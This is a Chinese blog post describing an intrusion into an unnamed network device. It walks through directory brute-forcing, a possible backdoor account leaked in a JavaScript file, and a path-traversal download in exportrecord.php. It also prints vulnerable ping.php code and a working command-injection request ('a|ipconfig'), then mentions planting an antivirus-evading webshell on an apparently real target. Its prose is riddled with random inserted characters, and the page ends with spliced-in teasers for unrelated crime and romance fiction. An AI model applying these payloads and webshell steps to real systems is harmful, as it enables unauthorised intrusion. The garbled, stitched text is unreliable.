某設(shè)備產(chǎn)品漏洞挖掘-從JS文件挖掘RCE

u=296456683,2163195517&fm=26&fmt=auto.jpeg

前言

某次滲透過程中碰到了個設(shè)備產(chǎn)品搏存,通過一些黑盒測試小技巧獲取目標(biāo)權(quán)限


在這里插入圖片描述

信息收集

【點擊獲取網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】

  1. 2000多本網(wǎng)絡(luò)安全系列電子書
  2. 網(wǎng)絡(luò)安全標(biāo)準(zhǔn)題庫資料
  3. 項目源碼
  4. 網(wǎng)絡(luò)安全基礎(chǔ)入門肠牲、Linux、web安全觉既、攻防方面的視頻
  5. 網(wǎng)絡(luò)安全學(xué)習(xí)路線圖

首先拿到了目標(biāo),同樣也需要對設(shè)備進行信息收集呻澜,登錄頁面有滑塊驗證和賬號密碼請求包加密


在這里插入圖片描述

暫時先放棄從JS里獲取密碼加密方法据忘,先嘗試找一些接口來獲取信息,查看源代碼


在這里插入圖片描述

訪問一下JS目錄讹语,這里有一個小技巧钙皮,當(dāng)目錄存在時會自動在后面加上 /, 例如瀏覽器訪問 /js, 將會變成 /js/ 來訪問
https://xxx.xxx.xxx.xxx/js
在這里插入圖片描述

這里簡單測試一下發(fā)現(xiàn)存在的目錄可以通過判斷403來確定目錄存在,對下一步文件爆破提供幫助顽决,這里使用Gobuster進行爆破


在這里插入圖片描述

獲取到的存在的目錄信息

/js/ (Status: 403)
/lan/ (Status: 403)
/php/ (Status: 403)
/images/ (Status: 403)
/html/ (Status: 403)
/vendors/ (Status: 403)
/upload/ (Status: 403)

我們需要注意的為 js 與 php 目錄下的文件株灸,才可能存在突破口,首先爆破 js目錄下的 js文件


在這里插入圖片描述

獲取后通過爬蟲遍歷 JS文件下載到本地翻閱擎值,其中發(fā)現(xiàn) /js/index.js 文件中有敏感信息,猜想可能是后門賬號或者默認(rèn)密碼


在這里插入圖片描述

拿著拿到的賬號去登錄一下試試


在這里插入圖片描述

成功登錄目標(biāo)系統(tǒng)逐抑,用戶為 administrator, 查看存在的用戶發(fā)現(xiàn)這個可能是后門賬戶

漏洞挖掘

任意文件讀取漏洞 (exportrecord.php)
目前我們以及獲取到了目標(biāo)的后臺管理權(quán)限鸠儿,且權(quán)限比較高,我們可以繼續(xù)測試漏洞
之前爆破到了 php目錄厕氨,猜測為功能性文件进每,我們可以通過 js文件中的信息獲取一些文件名和接口信息

在這里插入圖片描述

這里在 backup.js 文件中發(fā)現(xiàn)一個有關(guān)的下載接口

function downloadBak(index) {
    var data = $('#backupList').bootstrapTable("getData");
    if (index >= 0 && index < data.length) {
        var downurl = '../php/exportrecord.php?downname=' + data[index].id;
        window.open(downurl);
    }
}

猜測 downname參數(shù)為文件名,測試能不能下載文件

/php/exportrecord.php?downname=exportrecord.php
在這里插入圖片描述

這里得到了 /php/exportrecord.php 文件

傳入downname參數(shù)命斧,沒有對 ../ 符號過濾田晚,就導(dǎo)致跳目錄讀取文件
現(xiàn)在我們有了一個任意文件讀取,我們再通過目錄爆破獲取更多的PHP文件源碼


在這里插入圖片描述

遠程命令執(zhí)行漏洞 (ping.php)

通過剛剛到目錄爆破我們看到一個非常值得注意的文件 ping.php国葬,設(shè)備中常見的網(wǎng)絡(luò)聯(lián)通性測試文件贤徒,也是設(shè)備中常見的漏洞點, 通過文件讀取漏洞讀取文件


在這里插入圖片描述
function systemopr($type, $ip, $times=4){
     $info = array();     
     if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){
           //linux
           if($type == "0"){
               exec("ping -c $times $ip", $info);
           }else if($type == "1"){
               exec("traceroute -m $times -w 1 $ip", $info);
           }else{
               exec($ip, $info);
          }
     }else{
          //windows
          if($type == "0"){
               exec("ping $ip -n $times", $info);
          }else if($type == "1"){
               exec("tracert -h $times -w 1000 $ip", $info);
          }else{
               exec($ip, $info);
          }
     }
     return $info;
}
?>

這里可以看到這里接收的參數(shù) jsondata數(shù)組中的 ip參數(shù),用戶可控造成命令拼接汇四,而且通過 exec 執(zhí)行接奈,并且會 return到頁面中,導(dǎo)致回顯的RCE

POST /php/ping.php

jsondata[ip]=a|ipconfig&jsondata[type]=1
在這里插入圖片描述

目標(biāo)為Windows系統(tǒng)通孽,測試寫入phpinfo文件


在這里插入圖片描述

寫入免殺并流量加密的Webshell序宦,嘗試獲取目標(biāo)設(shè)備權(quán)限


在這里插入圖片描述

在這里插入圖片描述

最后

點擊查看【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】,私信我獲取網(wǎng)絡(luò)安全學(xué)習(xí)資料

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末背苦,一起剝皮案震驚了整個濱河市互捌,隨后出現(xiàn)的幾起案子潘明,更是在濱河造成了極大的恐慌,老刑警劉巖秕噪,帶你破解...
    沈念sama閱讀 207,113評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件钳降,死亡現(xiàn)場離奇詭異,居然都是意外死亡巢价,警方通過查閱死者的電腦和手機牲阁,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,644評論 2 381
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來壤躲,“玉大人城菊,你說我怎么就攤上這事〉锟耍” “怎么了凌唬?”我有些...
    開封第一講書人閱讀 153,340評論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長漏麦。 經(jīng)常有香客問我客税,道長,這世上最難降的妖魔是什么撕贞? 我笑而不...
    開封第一講書人閱讀 55,449評論 1 279
  • 正文 為了忘掉前任更耻,我火速辦了婚禮,結(jié)果婚禮上捏膨,老公的妹妹穿的比我還像新娘秧均。我一直安慰自己,他們只是感情好号涯,可當(dāng)我...
    茶點故事閱讀 64,445評論 5 374
  • 文/花漫 我一把揭開白布目胡。 她就那樣靜靜地躺著,像睡著了一般链快。 火紅的嫁衣襯著肌膚如雪誉己。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,166評論 1 284
  • 那天域蜗,我揣著相機與錄音巨双,去河邊找鬼。 笑死霉祸,一個胖子當(dāng)著我的面吹牛炉峰,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播脉执,決...
    沈念sama閱讀 38,442評論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼疼阔,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起婆廊,我...
    開封第一講書人閱讀 37,105評論 0 261
  • 序言:老撾萬榮一對情侶失蹤迅细,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后淘邻,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體茵典,經(jīng)...
    沈念sama閱讀 43,601評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,066評論 2 325
  • 正文 我和宋清朗相戀三年宾舅,在試婚紗的時候發(fā)現(xiàn)自己被綠了统阿。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,161評論 1 334
  • 序言:一個原本活蹦亂跳的男人離奇死亡筹我,死狀恐怖扶平,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情蔬蕊,我是刑警寧澤结澄,帶...
    沈念sama閱讀 33,792評論 4 323
  • 正文 年R本政府宣布,位于F島的核電站岸夯,受9級特大地震影響麻献,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜猜扮,卻給世界環(huán)境...
    茶點故事閱讀 39,351評論 3 307
  • 文/蒙蒙 一勉吻、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧旅赢,春花似錦齿桃、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,352評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽集惋。三九已至孕似,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間刮刑,已是汗流浹背喉祭。 一陣腳步聲響...
    開封第一講書人閱讀 31,584評論 1 261
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留雷绢,地道東北人泛烙。 一個月前我還...
    沈念sama閱讀 45,618評論 2 355
  • 正文 我出身青樓,卻偏偏與公主長得像翘紊,于是被迫代替她去往敵國和親蔽氨。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,916評論 2 344